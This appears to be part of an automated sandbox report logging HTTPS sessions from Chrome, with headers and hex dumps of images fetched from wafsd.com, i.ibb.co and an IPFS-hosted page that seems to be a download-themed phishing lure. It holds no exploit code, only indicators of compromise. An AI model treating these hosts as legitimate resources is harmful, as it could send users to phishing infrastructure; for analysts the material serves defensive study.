                            2025-01-07 17:46:40 UTC16384INData Raw: e8 90 07 15 88 c4 25 f3 06 71 4c c9 9a c0 08 8a b0 08 aa ac ca 8a 70 57 a5 ac 86 6c 90 c5 13 8a 02 7d f0 ca 7b d1 0c 8a c0 08 ba bc cb ba 5c 09 b6 fc 7a 47 28 01 26 93 03 90 40 8d 7c a6 08 8d 90 cc ca 9c cc 04 fc 1b a7 1a a0 46 7b 05 c9 49 88 9a d0 08 8e 70 cd d8 7c cd 8b fc 1a d6 40 07 5d 29 ca 17 e0 01 6c f0 cb 1d a6 0a 8f 70 ce e8 7c ce 8e 10 1f 01 3b 06 2d 07 9f fb c2 02 b5 3c 19 f4 e0 0a 97 10 09 90 90 cf f9 1c 09 fc 4c c3 b7 da 66 01 fa 46 42 20 a7 94 51 51 93 70 d0 08 3d 09 91 30 09 9d 6c 6a 7d 20 bd 2c 73 01 5a 30 63 05 ad 09 0b 3d 09 95 50 09 07 5d 09 20 b5 c7 41 97 06 b2 6c 2f 17 90 95 05 fd 09 93 60 09 95 60 09 28 bd d2 9a b0 cd ab 71 c2 bd 69 2d 37 80 08 c6 ff 4c 9f 91 a0 09 29 7d 09 3a 7d 09 96 d0 d2 5f 9c 1a b8 e7 30 ce a9 32 57 90 72 4b a8
                            Data Ascii: %qLpWl}{\zG(&@|F{Ip|@])lp|;-<LfFB QQp=0lj} ,sZ0c=P] Al/``(qi-7L)}:}_02WrK
                            2025-01-07 17:46:40 UTC16384INData Raw: 06 ff d4 d6 11 cb 69 a4 5f 22 a1 46 39 e2 51 40 1a e6 88 1e ba 88 45 29 16 e8 3d 07 b6 c2 87 ae 88 45 10 65 71 be 09 6a 70 7d f6 d3 96 93 b4 b5 c4 60 18 23 18 ca 80 a2 ae 6e 16 b9 6b 5c 23 62 f9 c3 a2 0a d5 46 b9 db dc 27 1a 32 ac 61 18 75 84 8e 5b a0 c2 6a a9 70 e0 03 5f f1 8a 58 0c 51 82 e7 ab 85 2d 6c b1 c1 5c 74 90 89 b0 91 e2 32 9e b1 c7 68 f4 91 1a 7f a4 46 c4 aa 78 8d 6d 54 11 8b 59 d4 e2 46 96 f7 8c 5e f4 62 19 d0 9b a1 18 25 69 43 5d a8 02 66 a8 f0 61 2b d6 d8 46 09 36 af 79 b6 c8 c5 2e 44 29 12 61 30 d1 18 cb 40 25 2a f7 f8 8c 3e 46 03 90 d4 18 a4 21 0f 39 cb 44 82 63 19 94 31 06 35 c0 d1 8e 49 f6 52 4b c5 9a 1a 26 d9 c8 c9 0a 7e 32 17 a1 14 e5 2e 48 79 1f 63 9c 32 95 7a 64 65 2b 5f 79 0d 58 12 72 96 87 ff e4 5f fe a2 d1 0b 5b ec 22 1a bb f4 65
                            Data Ascii: i_"F9Q@E)=Eeqjp}`#nk\#bF'2au[jp_XQ-l\t2hFxmTYF^b%iC]fa+F6y.D)a0@%*>F!9Dc15IRK&~2.Hyc2zde+_yXr_["e
                            2025-01-07 17:46:40 UTC10599INData Raw: 01 45 70 08 20 fb 1a f8 20 0c cf 70 b0 54 ca 84 dd ca 17 cd 40 07 0a f8 38 2b c6 07 55 0b 9a b6 10 0d db 90 b6 d9 4a 0d ce ca 18 04 19 2b 97 da 32 29 c0 06 65 cb 9f bb 94 b6 69 db 0d dd 00 0e cb 10 9f 8f f1 0d 8d c0 5e 57 23 01 25 40 06 2f 2b a8 8f 87 b7 db a0 b7 dd f0 0c 3f fb 18 c1 50 96 8d c9 2d 99 ca a3 27 7a 21 8a 9b ae c2 40 b3 8f d1 0c 0e 35 4d 29 33 ae c1 41 86 99 4b a5 8f db 6e 70 60 22 2e 53 2e 36 a0 09 ca 2a 99 81 62 0d 99 bb 0d d4 50 95 dc 16 08 b1 84 81 1d 86 06 96 6b 97 c1 10 0d d7 70 0d 99 6b 7e 28 5b 17 2c d9 03 8d 63 30 38 05 7f bf 21 24 e8 31 bb bd 70 b2 92 c1 a2 93 db 2b 20 90 04 e4 3a 98 c1 40 b1 b3 0b 9f 64 25 91 6b ff 30 2b 0c f4 00 36 50 07 3b bb 1a be f4 0c c1 9b b9 d4 90 0b c5 6b 17 df 00 08 3c 69 3f 8d 45 06 e7 ab 1a 4a 04 bc eb
                            Data Ascii: Ep pT@8+UJ+2)ei^W#%@/+?P-'z!@5M)3AKnp`".S.6*bPkpk~([,c08!$1p+ :@d%k0+6P;k<i?EJ


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.1649724169.197.85.954436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:40 UTC351OUTGET /5rThDVw/outlook.png HTTP/1.1
                            Host: i.ibb.co
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:41 UTC378INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Tue, 07 Jan 2025 17:46:41 GMT
                            Content-Type: image/png
                            Content-Length: 2503
                            Connection: close
                            Last-Modified: Mon, 29 Jul 2024 16:21:00 GMT
                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                            Cache-Control: max-age=315360000
                            Cache-Control: public
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, OPTIONS
                            Accept-Ranges: bytes
                            2025-01-07 17:46:41 UTC2503INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 6c 08 06 00 00 00 a2 b8 ba 32 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                            Data Ascii: PNGIHDRl2tEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.1649725195.35.33.2154436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:41 UTC365OUTGET /new/arsm/media/download-logo.png HTTP/1.1
                            Host: wafsd.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:41 UTC597INHTTP/1.1 200 OK
                            Connection: close
                            cache-control: public, max-age=604800
                            expires: Tue, 14 Jan 2025 17:46:41 GMT
                            content-type: image/png
                            last-modified: Fri, 05 Jan 2024 15:01:56 GMT
                            etag: "1e42-659819e4-9612b5e74948e7b0;;;"
                            accept-ranges: bytes
                            content-length: 7746
                            date: Tue, 07 Jan 2025 17:46:41 GMT
                            server: LiteSpeed
                            platform: hostinger
                            panel: hpanel
                            content-security-policy: upgrade-insecure-requests
                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                            2025-01-07 17:46:41 UTC771INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 4c 08 06 00 00 00 d7 fe 8a 9b 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 00 18 74 45 58 74 53 6f 66 74 77 61 72 65 00 70 61 69 6e 74 2e 6e 65 74 20 34 2e 30 2e 35 65 85 32 65 00 00 1d c0 49 44 41 54 78 5e ed 5d 09 98 24 45 99 ed e1 70 51 54 a0 bb b2 aa 9b 9d 05 71 15 05 af 75 65 d5 f5 c0 15 64 71 11 51 41 4e b9 d5 59 04 66 e8 ca ac 1e 66 f0 68 0f 0e 41 97 4b 05 c6 45 58 91 cf c5 71 97 73 a6 bb 22 ab db e6 66 17 06 e4 66 38 45 41 ce 01 1c d8 11 19 47 7a df 8b 8c ae ae 8c 88 ae ca ac ac ee ae ee 8e f7 7d ff 37 d3 95 7f 44 fc 11 19 f1 f2 8f bb a3 dd b1 c5 71 23 5b 76 07 c3 db 76 f7 86 3b 79 7e b8 7b be 18 7e b0 63 f9
                            Data Ascii: PNGIHDR,LgAMAapHYs(JtEXtSoftwarepaint.net 4.0.5e2eIDATx^]$EpQTquedqQANYffhAKEXqs"ff8EAGz}7Dq#[vv;y~{~c
                            2025-01-07 17:46:41 UTC6975INData Raw: cf 3a 16 2c db 54 3d 76 68 80 7c 69 e0 dd 7a f9 41 6e 50 8f 5b 0b 4b 42 6d 2d 63 84 d5 e3 8f e4 f0 ff bb 6c 3a 93 29 a8 dc 2f e3 df ab f0 55 d9 5c 15 e1 94 c0 0b 06 0f 29 f8 e2 72 90 d4 6f 20 cf e6 03 f1 d2 04 7b 33 5f e5 17 8e 5e 03 74 1e f7 4a e1 30 c8 ed 60 6e a9 52 51 39 68 70 84 95 0d 8e b0 ea c8 74 13 96 92 17 e8 c1 a8 22 9c 1c f4 f7 6f d4 d5 17 6e 5d f0 2b 0b 91 cf 47 40 3e d9 76 1a f8 e2 b7 dc 5e d5 b3 a8 b2 8d 1b 9f 89 c3 11 56 36 38 c2 aa 23 ed 41 58 e2 12 78 58 79 55 84 2d 07 f3 97 2f 86 01 d2 ba dd 4c 3b 93 6c 80 ed f7 16 fc f2 91 1d 48 43 25 37 e7 e1 08 2b 1b 1c 61 d5 91 e9 24 2c d9 d5 0a c2 6f 6c 7b d8 c8 66 aa f8 5a 0e 1e 09 8d 2e dc 39 f0 88 fe ac a7 af c9 7a 90 0f bb 85 7f 80 5d 6b d0 4d 7c 8e ff 87 bc d8 28 2c bb b5 e8 5e 9e b1 d5 f1 95
                            Data Ascii: :,T=vh|izAnP[KBm-cl:)/U\)ro {3_^tJ0`nRQ9hpt"on]+G@>v^V68#AXxXyU-/L;lHC%7+a$,ol{fZ.9z]kM|(,^


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.1649726195.35.33.2154436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:41 UTC360OUTGET /new/arsm/media/download.gif HTTP/1.1
                            Host: wafsd.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:41 UTC598INHTTP/1.1 200 OK
                            Connection: close
                            cache-control: public, max-age=604800
                            expires: Tue, 14 Jan 2025 17:46:41 GMT
                            content-type: image/gif
                            last-modified: Fri, 05 Jan 2024 15:01:56 GMT
                            etag: "1a6fb-659819e4-8867427b42dc9c;;;"
                            accept-ranges: bytes
                            content-length: 108283
                            date: Tue, 07 Jan 2025 17:46:41 GMT
                            server: LiteSpeed
                            platform: hostinger
                            panel: hpanel
                            content-security-policy: upgrade-insecure-requests
                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                            2025-01-07 17:46:41 UTC770INData Raw: 47 49 46 38 39 61 6a 01 6a 01 f7 00 00 00 ff 00 78 79 78 7a 7a 7a 7b 7b 7c 7b 7c 7b 7d 7c 7c 7d 7d 7c 7d 7d 7e 7d 7e 7c 7d 7e 7f 7e 7e 7e 7e 7e 7f 7e 7e 80 7e 7f 7e 7e 80 7e 7f 7d 7e 7f 7f 7e 7f 7f 7f 7f 7f 80 7f 7f 80 7f 80 7f 80 7f 7f 80 7f 80 80 80 80 80 80 80 80 81 7f 81 80 80 81 81 81 81 81 81 81 82 81 82 82 82 82 82 82 82 82 83 82 84 82 83 83 83 83 83 83 83 84 83 84 83 84 84 84 84 84 85 84 85 85 85 85 85 86 86 85 86 86 86 85 86 86 86 87 87 87 87 87 87 87 87 88 87 88 87 88 88 88 89 89 89 89 89 89 89 89 8a 89 8a 89 8a 89 8a 8a 8a 8a 8b 8a 8a 8b 8b 8b 8b 8b 8c 8b 8c 8b 8c 8c 8c 8d 8c 8c 8d 8d 8d 8d 8d 8d 8d 8d 8e 8d 8d 8e 8e 8e 8e 8e 8f 8f 8f 8f 8f 90 8f 90 90 90 8f 90 90 90 90 91 90 91 91 92 93 93 92 93 93 93 94 94 94 94 95 94 95 94 95 96 96 95 96 96
                            Data Ascii: GIF89ajjxyxzzz{{|{|{}||}}|}}~}~|}~~~~~~~~~~~~}~~
                            2025-01-07 17:46:41 UTC14994INData Raw: ff ff ff ff ff ff ff ff ff ff ff 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 08 00 00 00 2c 00 00 00 00 6a 01 6a 01 00 08 ff 00 01 08 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 6a dc c8 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b b7 ae dd bb 78 f3 ea dd cb b7 af df bf 80 03 0b 1e 4c b8 b0 e1 c3 88 13 2b 5e cc b8 b1 e3 c7 90 23 4b 9e 4c b9 b2 e5 cb 98 33 6b de cc b9 b3 e7 cf a0 43 8b 1e 4d ba b4 e9 d3 a8 53 ab 5e cd ba b5 eb d7 b0 63 cb 9e 4d bb b6
                            Data Ascii: !NETSCAPE2.0!,jjH*\#JH3j CI(S\0cI8s@JH*]PJJXj`Kh]pKxL+^#KL3kCMS^cM
                            2025-01-07 17:46:41 UTC16384INData Raw: 7f ff cc f4 1f 00 82 04 af 5f 04 5c 50 77 ad a1 0b 83 30 7f f6 87 07 77 80 07 78 e0 07 db 67 19 d6 b0 07 83 e7 7f d7 77 03 78 10 3a fe 36 09 7c 70 7f 0a 78 07 77 50 07 77 90 7f 9c 11 0c 60 60 6c 16 60 7d 11 00 02 5e f0 09 b1 d1 0c 82 90 07 1b c8 81 75 10 83 bb f7 7e 97 e1 0a c0 07 77 12 70 01 12 70 03 79 30 1b ae b0 07 1d 18 83 75 40 07 44 98 07 9a 60 81 9b 11 0c 6a 30 78 85 17 01 17 20 02 5a d0 79 ea 16 08 43 48 84 74 30 07 74 20 07 74 30 08 34 58 19 4b e6 64 4f 46 7c 12 20 03 75 d0 85 aa d1 0c 8c 80 07 44 38 07 73 20 07 5a 08 07 79 20 85 98 d1 0c 74 00 5f 5b 17 7c 1b e0 04 8e 80 84 b0 c1 66 7b 40 84 6e 18 88 71 30 65 72 68 19 d3 a7 75 07 96 60 c4 c7 02 6c 60 0b b5 ff f1 0d 86 90 85 72 10 07 94 48 89 72 a0 07 85 48 19 df 80 08 c1 55 78 0a e6 84 44 50 08
                            Data Ascii: _\Pw0wxgwx:6|pxwPw``l`}^u~wppy0u@D`j0x ZyCHt0t t04XKdOF| uD8s Zy t_[|f{@nq0erhu`l`rHrHUxDP
                            2025-01-07 17:46:41 UTC16384INData Raw: a6 8f 39 89 6c 60 bf 9c a1 c1 cc ab 7d 79 60 97 a6 21 a9 9c 48 7b 93 9b b9 6e 09 8b 8c f7 05 e4 a7 b0 53 a8 02 7b 30 bb 6e bb c1 bc e8 b2 b2 f1 ae e0 89 88 2a 40 bd 3a bb a3 57 ba 8d b3 81 a8 74 78 88 6c 80 c1 3a 9b 95 bc 28 9b 4e ac b4 15 cb b3 13 6b 19 60 eb 87 84 29 a2 b6 d1 08 29 cc 8e 79 40 a5 93 81 c2 3b 7a b4 1c 7a 1b 85 b0 83 65 2c c5 54 fb 17 c1 20 06 65 ff bc b1 99 9a b5 b8 b1 07 89 4a c8 68 9c af 74 28 93 16 40 9e b6 81 08 11 99 92 f4 97 06 f0 9b af 7e ab 97 5b 09 a3 bc 91 08 f4 68 b0 87 a8 06 9f ac a5 0a bb b1 13 f9 aa 7c e0 1b 83 9c c7 5d a8 ca 8f 51 b9 cf a8 99 16 c0 97 be f1 07 14 ba 9f d1 d6 18 d7 58 c3 a6 58 02 ed 0a 1c 79 90 a0 fb e9 06 81 0c a5 59 b9 c5 0c 80 c9 bd 61 08 79 f9 c6 0f e0 06 ab 5c 18 c3 1c c9 8e d9 b6 5e fa c2 65 4c 7f 6b
                            Data Ascii: 9l`}y`!H{nS{0n*@:Wtxl:(Nk`))y@;zze,T eJht(@~[h|]QXXyYay\^eLk
                            2025-01-07 17:46:41 UTC16384INData Raw: 74 b6 30 e5 9d 54 82 a0 67 09 7a ee c8 e7 8c 87 ce 48 28 8f ac 32 70 a8 8e 5e e6 ff 58 a3 0d 62 d0 61 64 30 91 e6 c4 66 21 74 8c 21 27 10 2d 8e d9 e2 0b c4 c6 a0 82 a7 a0 c6 68 c2 b2 a2 ea 29 aa a9 16 9c 0a c2 aa 7e 3e c0 00 a1 af 06 fa a5 ac 14 6a a2 89 2b b9 ce c4 26 23 75 c4 59 04 10 3d f4 80 6e a6 9a c6 e0 6e 0b f0 b2 80 c2 bc cb d6 6b 82 08 22 80 b0 41 b3 cf f2 49 e8 a9 7e 5a 90 2d 8f 87 de 88 a3 c1 38 8a 99 47 23 df 86 cb 52 80 9d f8 81 46 83 10 aa 8b ae ba ec 66 fa 6e bc f3 d2 6b 2f be 1e 80 ec 27 c0 d3 06 4c ed 8e d7 12 2c 30 a2 37 1a fc 62 1f 8c 3a 7c 12 79 a5 28 72 87 af 13 42 08 c4 b9 e8 ae ab 83 0e 36 e0 20 83 bb 31 70 dc f1 d1 f2 ca 8b 42 0b 2c 30 8d 82 95 7a 7a e0 c1 06 17 a0 ec aa ab 02 bb 4a 6d ca ac 6e fb 25 1c 8b 82 2b 33 48 23 aa 92 88
                            Data Ascii: t0TgzH(2p^Xbad0f!t!'-h)~>j+&#uY=nnk"AI~Z-8G#RFfnk/'L,07b:|y(rB6 1pB,0zzJmn%+3H#
                            2025-01-07 17:46:41 UTC16384INData Raw: e8 90 07 15 88 c4 25 f3 06 71 4c c9 9a c0 08 8a b0 08 aa ac ca 8a 70 57 a5 ac 86 6c 90 c5 13 8a 02 7d f0 ca 7b d1 0c 8a c0 08 ba bc cb ba 5c 09 b6 fc 7a 47 28 01 26 93 03 90 40 8d 7c a6 08 8d 90 cc ca 9c cc 04 fc 1b a7 1a a0 46 7b 05 c9 49 88 9a d0 08 8e 70 cd d8 7c cd 8b fc 1a d6 40 07 5d 29 ca 17 e0 01 6c f0 cb 1d a6 0a 8f 70 ce e8 7c ce 8e 10 1f 01 3b 06 2d 07 9f fb c2 02 b5 3c 19 f4 e0 0a 97 10 09 90 90 cf f9 1c 09 fc 4c c3 b7 da 66 01 fa 46 42 20 a7 94 51 51 93 70 d0 08 3d 09 91 30 09 9d 6c 6a 7d 20 bd 2c 73 01 5a 30 63 05 ad 09 0b 3d 09 95 50 09 07 5d 09 20 b5 c7 41 97 06 b2 6c 2f 17 90 95 05 fd 09 93 60 09 95 60 09 28 bd d2 9a b0 cd ab 71 c2 bd 69 2d 37 80 08 c6 ff 4c 9f 91 a0 09 29 7d 09 3a 7d 09 96 d0 d2 5f 9c 1a b8 e7 30 ce a9 32 57 90 72 4b a8
                            Data Ascii: %qLpWl}{\zG(&@|F{Ip|@])lp|;-<LfFB QQp=0lj} ,sZ0c=P] Al/``(qi-7L)}:}_02WrK
                            2025-01-07 17:46:41 UTC16384INData Raw: 06 ff d4 d6 11 cb 69 a4 5f 22 a1 46 39 e2 51 40 1a e6 88 1e ba 88 45 29 16 e8 3d 07 b6 c2 87 ae 88 45 10 65 71 be 09 6a 70 7d f6 d3 96 93 b4 b5 c4 60 18 23 18 ca 80 a2 ae 6e 16 b9 6b 5c 23 62 f9 c3 a2 0a d5 46 b9 db dc 27 1a 32 ac 61 18 75 84 8e 5b a0 c2 6a a9 70 e0 03 5f f1 8a 58 0c 51 82 e7 ab 85 2d 6c b1 c1 5c 74 90 89 b0 91 e2 32 9e b1 c7 68 f4 91 1a 7f a4 46 c4 aa 78 8d 6d 54 11 8b 59 d4 e2 46 96 f7 8c 5e f4 62 19 d0 9b a1 18 25 69 43 5d a8 02 66 a8 f0 61 2b d6 d8 46 09 36 af 79 b6 c8 c5 2e 44 29 12 61 30 d1 18 cb 40 25 2a f7 f8 8c 3e 46 03 90 d4 18 a4 21 0f 39 cb 44 82 63 19 94 31 06 35 c0 d1 8e 49 f6 52 4b c5 9a 1a 26 d9 c8 c9 0a 7e 32 17 a1 14 e5 2e 48 79 1f 63 9c 32 95 7a 64 65 2b 5f 79 0d 58 12 72 96 87 ff e4 5f fe a2 d1 0b 5b ec 22 1a bb f4 65
                            Data Ascii: i_"F9Q@E)=Eeqjp}`#nk\#bF'2au[jp_XQ-l\t2hFxmTYF^b%iC]fa+F6y.D)a0@%*>F!9Dc15IRK&~2.Hyc2zde+_yXr_["e
                            2025-01-07 17:46:41 UTC10599INData Raw: 01 45 70 08 20 fb 1a f8 20 0c cf 70 b0 54 ca 84 dd ca 17 cd 40 07 0a f8 38 2b c6 07 55 0b 9a b6 10 0d db 90 b6 d9 4a 0d ce ca 18 04 19 2b 97 da 32 29 c0 06 65 cb 9f bb 94 b6 69 db 0d dd 00 0e cb 10 9f 8f f1 0d 8d c0 5e 57 23 01 25 40 06 2f 2b a8 8f 87 b7 db a0 b7 dd f0 0c 3f fb 18 c1 50 96 8d c9 2d 99 ca a3 27 7a 21 8a 9b ae c2 40 b3 8f d1 0c 0e 35 4d 29 33 ae c1 41 86 99 4b a5 8f db 6e 70 60 22 2e 53 2e 36 a0 09 ca 2a 99 81 62 0d 99 bb 0d d4 50 95 dc 16 08 b1 84 81 1d 86 06 96 6b 97 c1 10 0d d7 70 0d 99 6b 7e 28 5b 17 2c d9 03 8d 63 30 38 05 7f bf 21 24 e8 31 bb bd 70 b2 92 c1 a2 93 db 2b 20 90 04 e4 3a 98 c1 40 b1 b3 0b 9f 64 25 91 6b ff 30 2b 0c f4 00 36 50 07 3b bb 1a be f4 0c c1 9b b9 d4 90 0b c5 6b 17 df 00 08 3c 69 3f 8d 45 06 e7 ab 1a 4a 04 bc eb
                            Data Ascii: Ep pT@8+UJ+2)ei^W#%@/+?P-'z!@5M)3AKnp`".S.6*bPkpk~([,c08!$1p+ :@d%k0+6P;k<i?EJ


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.1649727195.35.33.2154436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:41 UTC656OUTGET /new/arsm/media/favicon.ico HTTP/1.1
                            Host: wafsd.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:41 UTC600INHTTP/1.1 200 OK
                            Connection: close
                            cache-control: public, max-age=604800
                            expires: Tue, 14 Jan 2025 17:46:41 GMT
                            content-type: image/x-icon
                            last-modified: Fri, 05 Jan 2024 15:01:56 GMT
                            etag: "1ece-659819e4-4ab91640bc30ae0c;;;"
                            accept-ranges: bytes
                            content-length: 7886
                            date: Tue, 07 Jan 2025 17:46:41 GMT
                            server: LiteSpeed
                            platform: hostinger
                            panel: hpanel
                            content-security-policy: upgrade-insecure-requests
                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                            2025-01-07 17:46:41 UTC7886INData Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 6c 00 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Data Ascii: 6 hf( @ l


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.1649729195.35.33.2154436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:42 UTC359OUTGET /new/arsm/media/favicon.ico HTTP/1.1
                            Host: wafsd.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:42 UTC600INHTTP/1.1 200 OK
                            Connection: close
                            cache-control: public, max-age=604800
                            expires: Tue, 14 Jan 2025 17:46:42 GMT
                            content-type: image/x-icon
                            last-modified: Fri, 05 Jan 2024 15:01:56 GMT
                            etag: "1ece-659819e4-4ab91640bc30ae0c;;;"
                            accept-ranges: bytes
                            content-length: 7886
                            date: Tue, 07 Jan 2025 17:46:42 GMT
                            server: LiteSpeed
                            platform: hostinger
                            panel: hpanel
                            content-security-policy: upgrade-insecure-requests
                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
